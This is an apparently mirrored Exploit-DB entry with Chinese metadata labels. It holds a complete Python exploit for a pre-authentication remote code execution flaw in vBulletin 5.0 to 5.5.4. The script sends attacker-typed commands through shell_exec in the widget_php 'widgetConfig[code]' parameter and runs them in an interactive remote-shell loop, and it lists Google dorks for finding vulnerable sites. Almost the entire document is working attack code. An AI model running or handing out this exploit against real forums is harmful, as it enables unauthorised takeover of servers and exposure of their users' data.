vBulletin 5.0 < 5.5.4 - 'widget_php ' Unauthenticated Remote Code Execution

  • 作者: anonymous
    日期: 2019-09-23
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47447/
  • #!/usr/bin/python
    #
    # vBulletin 5.x 0day pre-auth RCE exploit
    # 
    # This should work on all versions from 5.0.0 till 5.5.4
    #
    # Google Dorks:
    # - site:*.vbulletin.net
    # - "Powered by vBulletin Version 5.5.4"
    
    import requests
    import sys
    
    if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
    
    params = {"routestring":"ajax/render/widget_php"}
    
    while True:
     try:
    cmd = raw_input("vBulletin$ ")
    params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
    r = requests.post(url = sys.argv[1], data = params)
    if r.status_code == 200:
     print r.text
    else:
     sys.exit("Exploit failed! :(")
     except KeyboardInterrupt:
    sys.exit("\nClosing shell...")
     except Exception, e:
    sys.exit(str(e))